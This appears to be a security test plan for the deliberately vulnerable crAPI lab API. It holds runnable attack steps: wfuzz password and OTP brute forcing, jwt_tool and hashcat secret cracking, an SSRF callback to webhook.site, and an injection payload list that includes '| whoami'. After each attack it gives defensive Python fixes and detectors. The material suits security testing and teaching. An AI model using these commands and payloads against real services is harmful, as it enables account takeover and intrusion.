Preconditions:
- Install mentalist: https://github.com/sc0tfree/mentalist/wiki/Installation#linux-apt-package-manager
- Install cupp: https://github.com/Mebus/cupp
Steps:
wfuzz -d '{"email":"[email protected]","password":"FUZZ"}' -H 'Content-Type: application/json' -z file,/usr/share/wordlists/rockyou.txt -u http://127.0.0.1:8888/identity/api/auth/login --hc 405
Expected result:
- Should be able to find correct usernames and passwords
Preconditions:
- Save the response containing an excessive data exposure as "response.json".
- Pull emails from the saved JSON response and save as crapiusers file
grep -oe "[a-zA-Z0-9._]\+@[a-zA-Z0-9.-]\+\.[a-zA-Z]\+" response.json > crapiusers
- Sort unique emails and save as crapiuniq file
sort -u crapiusers > crapiuniq
- Create passwords short list
Password1
Password3
Password123
Crapi123
Summer2022!
Spring2022!
March212006!
Fall2021!
12345Qwert!
Dorsey@2022
Steps:
- Burp Suite Intruder: Cluster bomb attack type
- Set the users and passwords lists as the payload sets
- Run the attack
- Payload processing: Base64-encode
- Ctrl-Shift-B -> right click -> Convert selection -> Base64 decode
Expected result:
- Should be able to find the correct password
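Defender-side counterpart to the two credential attacks above (the rockyou brute force against one account and the cluster-bomb run over the harvested email list). This is an added example, not part of the original test plan or of crAPI: it reads login log lines and flags both patterns. The log format, the thresholds and the sample lines are constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real crAPI output): one source hammering a single
# account, and a second source trying many different accounts once each.
SAMPLE_LOG = """\
2022-03-21T10:00:01Z 10.0.0.5 POST /identity/api/auth/login email=alice@example.com status=401
2022-03-21T10:00:03Z 10.0.0.5 POST /identity/api/auth/login email=alice@example.com status=401
2022-03-21T10:00:05Z 10.0.0.5 POST /identity/api/auth/login email=alice@example.com status=401
2022-03-21T10:00:07Z 10.0.0.5 POST /identity/api/auth/login email=alice@example.com status=401
2022-03-21T10:00:09Z 10.0.0.5 POST /identity/api/auth/login email=alice@example.com status=401
2022-03-21T10:00:11Z 10.0.0.5 POST /identity/api/auth/login email=alice@example.com status=401
2022-03-21T10:05:00Z 10.0.0.9 POST /identity/api/auth/login email=bob@example.com status=401
2022-03-21T10:05:01Z 10.0.0.9 POST /identity/api/auth/login email=carol@example.com status=401
2022-03-21T10:05:02Z 10.0.0.9 POST /identity/api/auth/login email=dave@example.com status=401
2022-03-21T10:05:03Z 10.0.0.9 POST /identity/api/auth/login email=erin@example.com status=401
2022-03-21T10:05:04Z 10.0.0.9 POST /identity/api/auth/login email=frank@example.com status=401
2022-03-21T10:05:05Z 10.0.0.9 POST /identity/api/auth/login email=bob@example.com status=200
2022-03-21T10:30:00Z 10.0.0.7 POST /identity/api/auth/login email=alice@example.com status=401
"""

# Assumed line layout: "<iso-timestamp> <client-ip> POST <path> email=<email> status=<code>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) POST /identity/api/auth/login "
    r"email=(?P<email>\S+) status=(?P<status>\d{3})$"
)


def parse_events(text):
    """Yield (timestamp, ip, email, status) for every parseable login line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated or malformed line; a real pipeline would count these
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["ip"], m["email"], int(m["status"])))
    return events


def max_in_window(times, window):
    """Largest number of timestamps that fall inside any sliding window of `window`."""
    times = sorted(times)
    best, start = 0, 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_bruteforce(text, threshold=5, window=timedelta(minutes=1)):
    """Return sorted (kind, key, count) alerts.

    password-bruteforce: one account sees >= threshold failures inside `window`.
    credential-stuffing: one source IP fails against >= threshold distinct accounts.
    """
    failures_by_account = defaultdict(list)  # email -> failure timestamps
    targets_by_ip = defaultdict(set)         # ip -> distinct emails that failed
    for ts, ip, email, status in parse_events(text):
        if status == 401:
            failures_by_account[email].append(ts)
            targets_by_ip[ip].add(email)

    alerts = []
    for email, times in failures_by_account.items():
        n = max_in_window(times, window)
        if n >= threshold:
            alerts.append(("password-bruteforce", email, n))
    for ip, emails in targets_by_ip.items():
        if len(emails) >= threshold:
            alerts.append(("credential-stuffing", ip, len(emails)))
    return sorted(alerts)


if __name__ == "__main__":
    for kind, key, count in detect_bruteforce(SAMPLE_LOG):
        print(f"{kind:20} {key:25} {count}")
```

The two detections deliberately key on different things: a single target account catches the rockyou run regardless of how many source addresses it is spread over, while distinct accounts per source catches the harvested-list run even when each account only sees one or two attempts and never trips a per-account lockout.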
Preconditions:
- Analyze the JWT token
- Intercept the request in Burp Suite
- Open it in Sequencer, click Configure and highlight the token value
- Use jwt_tool to analyze it:
Steps:
- Automate JWT attacks with the jwt_tool automated tool:
jwt_tool -t http://127.0.0.1:8888/identity/api/v2/user/dashboard -rh "Authorization: Bearer eyJhbGciOiJSUzI1NiJ9....2QKV-qv72Q" -M pb
Change Algorithm value to "none":
jwt_tool eyJhbGciOiJ....dWIip6Ym2QKV_-qv72Q -X a
- JWT secret cracking attack. Generate a wordlist:
crunch 5 5 -o crapi.txt
Run jwt_tools to find secret key
jwt_tool eyJhbGciOiJSUzI1NiJ9....2QKV-qv72Q -C -d crapi.txt
Or run hashcat to crack the signing secret (run once to crack, then with --show to print the recovered secret from the potfile):
hashcat -a 0 -m 16500 eyJhbGyKcjHKjhw....akjF46xCpioGU0 /home/lizard/Downloads/rockyou.txt --show
Expected result:
- Should be able to find the secret key
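What a server-side verifier has to do for both JWT cases above (alg set to "none", and a guessable signing secret) to fail. Added example, not code from the original test plan or from crAPI; it uses only the standard library, pins HS256 instead of trusting the token's own alg field, and refuses short secrets. The minimum secret length and the sample tokens are assumptions made for this example.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

MIN_SECRET_BYTES = 32  # assumed policy: HS256 keys shorter than the hash output are too weak


class JwtError(Exception):
    pass


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Mint a token so the verifier can be exercised offline (helper for this example)."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes, now: Optional[float] = None) -> dict:
    """Return the payload of a valid token or raise JwtError."""
    if len(secret) < MIN_SECRET_BYTES:
        raise JwtError("signing secret too short to resist offline cracking")
    parts = token.split(".")
    if len(parts) != 3:
        raise JwtError("malformed token")
    h_b64, p_b64, s_b64 = parts
    try:
        header = json.loads(b64url_decode(h_b64))
        signature = b64url_decode(s_b64)
    except (ValueError, UnicodeDecodeError):
        raise JwtError("undecodable header or signature")
    # Pin the algorithm server-side. The token's alg field is attacker-controlled,
    # so "none" (and every other value) is rejected before the signature is examined.
    if header.get("alg") != "HS256":
        raise JwtError(f"unexpected alg {header.get('alg')!r}")
    expected = hmac.new(secret, f"{h_b64}.{p_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        raise JwtError("signature mismatch")
    try:
        payload = json.loads(b64url_decode(p_b64))
    except (ValueError, UnicodeDecodeError):
        raise JwtError("undecodable payload")
    now = time.time() if now is None else now
    exp = payload.get("exp")
    if not isinstance(exp, (int, float)) or exp <= now:
        raise JwtError("token expired or missing exp")
    return payload


def is_valid(token: str, secret: bytes, now: Optional[float] = None) -> bool:
    try:
        verify_hs256(token, secret, now)
        return True
    except JwtError:
        return False


if __name__ == "__main__":
    secret = b"example-signing-secret-with-at-least-32-bytes"  # constructed
    good = sign_hs256({"sub": "alice@example.com", "exp": 2_000_000_000}, secret)
    h, p, _ = good.split(".")
    alg_none = b64url_encode(b'{"alg":"none","typ":"JWT"}') + "." + p + "."
    print("signed token valid:", is_valid(good, secret))
    print("alg=none accepted:", is_valid(alg_none, secret))
```

Note that the check order matters: the alg comparison comes before any signature work, so an alg-none token never reaches a code path that could treat an empty signature as acceptable, and a key that fails the length policy is refused at startup rather than discovered by a crunch wordlist.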
Scope:
GET /identity/api/v2/videos/:id?video_id={id}
GET /community/api/v2/community/posts/{id}
GET /identity/api/v2/vehicle/{id}/location
Test Data:
- name: UserA; email: [email protected]; phone: 0112233445
- name: UserB; email: [email protected]; phone: 0112233446
Steps:
- Create a UserA account.
- Use the API and discover requests that involve resource IDs as UserA.
- Document requests that include resource IDs and should require authorization.
- Create a UserB account.
- Obtain a valid UserB token and attempt to access UserA's resources.
Expected result:
- UserB should be able to access UserA's page using the id parameter
Scope:
POST /workshop/api/shop/orders/return_order?order_id={id}
POST /community/api/v2/community/posts/{id}/comment
PUT /identity/api/v2/user/videos/{id}
DELETE /identity/api/v2/user/videos/{id}
Test Data:
- name: UserA; email: [email protected]; phone: 0112233445
- name: UserB; email: [email protected]; phone: 0112233446
Steps:
- Create a UserA account.
- As UserA, add a new order, post a new comment, and upload a video on the profile page
- Document requests that include resource IDs and should require authorization.
- Create a UserB account.
- As UserB, return the order, post the comment, and edit the video name using UserA's ids for the in-scope requests.
- Change the value 'user' to 'admin' in the URL
- Delete the video of UserA
Expected result:
- A user shouldn't be able to edit content on another user's page.
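The two object-level test cases above (reading another user's resources by id, and returning, commenting on, renaming or deleting them, including the 'user' to 'admin' path swap) come down to two checks the handler must make. Added example, not the test plan's or crAPI's code: an in-memory stand-in for the /identity/api/v2/{user|admin}/videos/{id} handlers with an ownership check on every lookup and a role check on the admin route. The request body field name and the HTTP statuses are assumptions.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class User:
    user_id: int
    role: str = "user"  # "user" or "admin"; taken from the session, never from the request


@dataclass
class Video:
    video_id: int
    owner_id: int
    name: str


class VideoService:
    """Stand-in for the video handlers; handle() returns (http_status, body)."""

    def __init__(self):
        self._videos = {}
        self._next_id = 1

    def upload(self, actor: User, name: str) -> Video:
        video = Video(self._next_id, actor.user_id, name)
        self._videos[video.video_id] = video
        self._next_id += 1
        return video

    def _owned(self, actor: User, video_id: int) -> Optional[Video]:
        # Object-level check: the lookup is scoped to the caller, so a foreign id
        # looks exactly like a missing one (no 403-vs-404 oracle to enumerate ids with).
        video = self._videos.get(video_id)
        if video is None or video.owner_id != actor.user_id:
            return None
        return video

    def handle(self, actor: User, method: str, segment: str, video_id: int,
               body: Optional[dict] = None):
        """Dispatch one request to /identity/api/v2/{segment}/videos/{video_id}."""
        if segment == "admin":
            # Function-level check: the privileged route is gated by the caller's role,
            # not by whether the client typed 'admin' into the path.
            if actor.role != "admin":
                return 403, {"error": "forbidden"}
            if method != "DELETE":
                return 405, {"error": "method not allowed"}
            if self._videos.pop(video_id, None) is None:
                return 404, {"error": "not found"}
            return 200, {"deleted": video_id}

        if segment != "user":
            return 404, {"error": "not found"}
        video = self._owned(actor, video_id)
        if video is None:
            return 404, {"error": "not found"}
        if method == "GET":
            return 200, {"id": video.video_id, "name": video.name}
        if method == "PUT":
            if not body or not isinstance(body.get("videoName"), str):
                return 400, {"error": "videoName required"}
            video.name = body["videoName"]  # only the name is client-writable, never owner_id
            return 200, {"id": video.video_id, "name": video.name}
        if method == "DELETE":
            del self._videos[video.video_id]
            return 200, {"deleted": video.video_id}
        return 405, {"error": "method not allowed"}


if __name__ == "__main__":
    svc = VideoService()
    user_a, user_b = User(1), User(2)
    video = svc.upload(user_a, "trip.mp4")
    print("UserB reads UserA's video:", svc.handle(user_b, "GET", "user", video.video_id))
    print("UserB renames it:", svc.handle(user_b, "PUT", "user", video.video_id, {"videoName": "x"}))
    print("UserB via admin path:", svc.handle(user_b, "DELETE", "admin", video.video_id))
```

The ownership filter lives in one place (`_owned`) that every per-user verb goes through, so adding a new verb cannot forget it; the admin branch is the only code that reaches `_videos` without that filter, and it is reachable only after the role check.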
Scope:
GET /identity/api/{{ver}}/user/dashboard
POST /identity/api/{{ver}}/user/videos/
PUT /identity/api/{{ver}}/user/videos/
DELETE /identity/api/{{ver}}/vehicle/vehicles
POST /identity/api/{{ver}}/user/change-email
POST /identity/api/{{ver}}/user/pictures
POST /identity/api/{{ver}}/user/reset-password
POST /identity/api/auth/{{ver}}/check-otp
GET /community/api/{{ver}}/community/posts/recent
POST /community/api/{{ver}}/community/posts
GET /community/api/{{ver}}/community/posts/
POST /community/api/{{ver}}/community/posts/{{post_id}}/comment
Test Data:
- email: [email protected]; password: 12345Qwert!; otp: 'anyvalue'
Steps:
- Create a new Postman environment variable {{ver}} for the API version
- Run the collection once for each value of the variable: api1, api2, api3
- Compare the responses across the runs with the different API version values
- Note that the request
POST /identity/api/auth/api2/check-otp
returns a different response: "Invalid OTP! Please try again.."
- Fuzz the request with command:
wfuzz -d '{"email":"[email protected]", "otp":"FUZZ","password":"12345Qwert!"}' -H 'Content-Type: application/json' -z file,/usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http://127.0.0.1:8888/identity/api/auth/v2/check-otp --hc 500
- Note the OTP value whose request returns a 200 response
- Put received otp value in request and send the request.
Expected result:
- The user should be able to change the password through the old API by fuzzing the OTP request until the correct value is received
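The finding above exists because the older API version verifies OTPs with no attempt limit, so a 4-digit space is exhausted by the wfuzz run. Added example, not from the test plan or crAPI: one OTP verifier object that every API version must route through, with a per-challenge attempt cap, constant-time comparison, single use, and the same response text whatever the version. The cap, the 4-digit format and the status codes are assumptions for this example.

```python
import hmac
import secrets
from dataclasses import dataclass

MAX_ATTEMPTS = 5  # assumed policy: after this many wrong codes the challenge is dead


@dataclass
class OtpChallenge:
    code: str
    attempts: int = 0
    consumed: bool = False


class OtpService:
    """Shared OTP verifier; v1, v2, v3 ... of check-otp all call check() on one instance."""

    def __init__(self):
        self._challenges = {}

    def issue(self, email: str) -> str:
        code = f"{secrets.randbelow(10_000):04d}"
        self._challenges[email] = OtpChallenge(code)  # a new code replaces any older one
        # Sent to the user out-of-band in a real system; returned here so the example runs offline.
        return code

    def check(self, email: str, submitted: str):
        """Return (http_status, message); identical strings for every API version."""
        challenge = self._challenges.get(email)
        if challenge is None or challenge.consumed:
            return 401, "Invalid OTP! Please try again.."
        if challenge.attempts >= MAX_ATTEMPTS:
            return 429, "Too many attempts. Request a new OTP."
        challenge.attempts += 1  # counted before comparing, so a crash cannot reset it
        if not hmac.compare_digest(challenge.code.encode(), str(submitted).encode()):
            return 401, "Invalid OTP! Please try again.."
        challenge.consumed = True  # single use: the same code cannot be replayed
        return 200, "OTP accepted"


def attempts_before_lockout(svc: OtpService, email: str) -> int:
    """Submit a value that can never match until the service refuses; count evaluated guesses."""
    for n in range(10_000):
        status, _ = svc.check(email, "xxxx")
        if status == 429:
            return n
    return 10_000  # no cap in force: the whole space was evaluated


if __name__ == "__main__":
    svc = OtpService()
    code = svc.issue("alice@example.com")  # constructed account
    print("guesses evaluated before lockout:", attempts_before_lockout(svc, "alice@example.com"))
    print("correct code after lockout:", svc.check("alice@example.com", code))
```

The retired version of the endpoint is the one to watch: if each version keeps its own verifier, fixing the current one leaves the old one exactly as the fuzzing step found it, which is why the cap belongs in the shared object rather than in a single route handler.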
Scope:
GET /identity/api/auth/signup
Test Data:
"isadmin": true,
"isAdmin":"true",
"admin": 1,
"admin": true,
"isadmin": 1,
"isAdmin":"1",
Steps:
- Intercept the request in Burp Suite
- Brute force new key:value field in request via Burp Suite Intruder - Cluster Bomb
- Start 'Param miner' extension in Burp suite:
Select Extensions > Param Miner > Guess params > Guess JSON parameter
Expected result:
- Find the parameters through which a user can assign themselves admin permissions
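The server-side fix for the mass assignment case above is to bind only a fixed set of signup fields and to decide privilege itself. Added example, not the test plan's or crAPI's code: a strict binder that rejects, rather than silently drops, any field outside the schema (so the isadmin/isAdmin/admin variants from the test data all come back as 400 and show up in logs), and an Account whose is_admin can only be set by the server. The field names, the password policy and the hashing parameters are assumptions for this example.

```python
import hashlib
import os
import re
from dataclasses import dataclass

# Assumed signup schema; the field names are not taken from this page.
SIGNUP_FIELDS = {"name": str, "email": str, "number": str, "password": str}
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
MIN_PASSWORD_LEN = 12


@dataclass
class Account:
    name: str
    email: str
    number: str
    password_hash: str
    is_admin: bool = False  # privilege is a server decision, never a request field


def hash_password(password: str) -> str:
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt.hex() + "$" + digest.hex()


def bind_signup(payload):
    """Bind a decoded JSON signup body; returns (http_status, Account or error dict)."""
    if not isinstance(payload, dict):
        return 400, {"error": "JSON object expected"}
    # Strict binding: anything outside the schema is an error, not something to ignore.
    # Rejecting makes Param Miner style guessing visible instead of silently absorbed.
    unknown = sorted(set(payload) - set(SIGNUP_FIELDS))
    if unknown:
        return 400, {"error": "unknown fields", "fields": unknown}
    missing = sorted(set(SIGNUP_FIELDS) - set(payload))
    if missing:
        return 400, {"error": "missing fields", "fields": missing}
    for field_name, expected_type in SIGNUP_FIELDS.items():
        if not isinstance(payload[field_name], expected_type):
            return 400, {"error": f"{field_name} must be {expected_type.__name__}"}
    if not EMAIL_RE.fullmatch(payload["email"]):
        return 400, {"error": "invalid email"}
    if len(payload["password"]) < MIN_PASSWORD_LEN:
        return 400, {"error": "password too short"}
    account = Account(
        name=payload["name"],
        email=payload["email"],
        number=payload["number"],
        password_hash=hash_password(payload["password"]),
    )  # is_admin is deliberately not a constructor argument here
    return 201, account


if __name__ == "__main__":
    base = {"name": "Alice", "email": "alice@example.com", "number": "0112233445",
            "password": "correct-horse-battery"}  # constructed
    print(bind_signup(base)[0])
    for probe in ({"isadmin": True}, {"isAdmin": "true"}, {"admin": 1}):
        print(probe, "->", bind_signup({**base, **probe}))
```

Binding to a dataclass with an explicit field list is what makes this hold: there is no generic "copy every JSON key onto the model" step, so there is no key name left for a cluster-bomb run to discover.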
Scope:
POST /workshop/api/merchant/contact_mechanic
POST /workshop/api/shop/orders
GET /workshop/api/shop/products
Steps:
- Intercept the request in Burp Suite
- Analyze the response body
- Change the values in request
- Check the response
- Change the request method from GET to POST
- Check the response
Expected result:
- User shouldn't be able to add own products
Requests to look for:
- Full URLs included in the POST body or parameters
- URL paths (or partial URLs) included in the POST body or parameters
- Headers that include URLs, such as Referer
Scope:
POST /community/api/v2/community/posts
POST /workshop/api/shop/orders/return_order?order_id=4000
POST /workshop/api/merchant/contact_mechanic
Steps:
- Intercept the request in Burp Suite
- Send to intruder
- Change the url values in requests with 'https://webhook.site/8d149a33-49a8-4ebe-926f-891d58294d8d'
- Check for the callback at https://webhook.site
Expected result:
- The user can replace the URL values in the request; the server should sanitize user-supplied URLs before fetching them
Test data: SQL/NoSQL/command injection payload list:
'
''
;%00
-
-- -
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
OR 1=1/*
"or 1=1;%00
OR 1=1
admin"#
admin' --
admin" OR "1"="1
{"$gt":""}
{"$gt":-1}
{"$ne":""}
{"$ne":-1}
$nin
{"$nin":1}
| whoami
||
&
&&
"
;
'"
Scope:
GET /identity/api/v2/user/videos/{{video_id}}
POST /workshop/api/shop/orders/return_order?order_id=4000
POST /workshop/api/merchant/contact_mechanic
POST /identity/api/v2/user/change-email
POST /identity/api/auth/v2/check-otp
POST /workshop/api/shop/orders/return_order?order_id={{fuzz}}
POST /community/api/{{ver}}/community/posts
POST /community/api/{{ver}}/coupon/validate-coupon
Steps:
- Create duplicate postman collection for fuzzing
- Create 'fuzz' environment variable
- Assign payload from payload list to variable
- Run postman collection with each value
- In Burp Suite run Intruder - Sniper with payload list from test data
- Run wfuzz:
wfuzz -z file,/usr/share/wordlists/seclists/Fuzzing/nosql.txt -H "Authorization: Bearer eyJhbGciOiJSUz....gDojE2FWg" -H "Content-Type: application/json" -d "{\"coupon_code\":FUZZ}" http://127.0.0.1:8888/community/api/v2/coupon/validate-coupon
Expected result:
- The server should sanitize URL and field inputs from the user
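The validate-coupon request fuzzed above takes whatever JSON value FUZZ expands to, so a payload like {"$gt":""} arrives as an object rather than a string. Added example, not the test plan's or crAPI's code: a handler for that endpoint that parses the body, refuses any "$"-prefixed key and any non-string coupon_code, constrains the code's format, and then looks it up with a bound parameter. The coupon format, the sample coupons and the in-memory SQLite table are constructed for this example; the same shape applies to the other in-scope fields.

```python
import json
import re
import sqlite3

COUPON_RE = re.compile(r"^[A-Z0-9]{4,20}$")  # assumed coupon format


class ValidationError(Exception):
    pass


def reject_operators(value, path="$"):
    """Recursively refuse any object key beginning with '$' (MongoDB operator injection)."""
    if isinstance(value, dict):
        for key, inner in value.items():
            if not isinstance(key, str) or key.startswith("$"):
                raise ValidationError(f"operator key {key!r} at {path}")
            reject_operators(inner, f"{path}.{key}")
    elif isinstance(value, list):
        for i, inner in enumerate(value):
            reject_operators(inner, f"{path}[{i}]")


def parse_coupon_request(raw_body: str) -> str:
    """Turn the raw request body into a validated coupon code string."""
    try:
        body = json.loads(raw_body)
    except ValueError:
        raise ValidationError("body is not JSON")
    if not isinstance(body, dict):
        raise ValidationError("JSON object expected")
    reject_operators(body)
    code = body.get("coupon_code")
    # Type check first: {"$ne": ""} is a dict, not a string, and must never reach a query.
    if not isinstance(code, str):
        raise ValidationError("coupon_code must be a string")
    if not COUPON_RE.fullmatch(code):
        raise ValidationError("coupon_code has an invalid format")
    return code


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE coupons (code TEXT PRIMARY KEY, amount INTEGER)")
    conn.executemany("INSERT INTO coupons VALUES (?, ?)",
                     [("SUMMER10", 10), ("WELCOME5", 5)])  # constructed sample coupons
    return conn


def lookup_coupon(conn: sqlite3.Connection, code: str):
    # Parameterized: the value is bound by the driver, never concatenated into the SQL text.
    row = conn.execute("SELECT amount FROM coupons WHERE code = ?", (code,)).fetchone()
    return None if row is None else row[0]


def validate_coupon(conn: sqlite3.Connection, raw_body: str):
    """Handler for POST .../coupon/validate-coupon; returns (http_status, body)."""
    try:
        code = parse_coupon_request(raw_body)
    except ValidationError as exc:
        return 400, {"error": str(exc)}
    amount = lookup_coupon(conn, code)
    if amount is None:
        return 404, {"error": "invalid coupon"}
    return 200, {"coupon_code": code, "amount": amount}


if __name__ == "__main__":
    conn = make_db()
    for body in ('{"coupon_code":"SUMMER10"}', '{"coupon_code":{"$ne":""}}',
                 '{"coupon_code":"\' OR 1=1 -- -"}', '{"coupon_code":"| whoami"}'):
        print(body, "->", validate_coupon(conn, body))
```

Two independent layers are at work: the schema check turns every payload in the test-data list into a 400 before any query runs, and the bound parameter means that even a code which somehow passed the format check would be compared as data, not parsed as SQL.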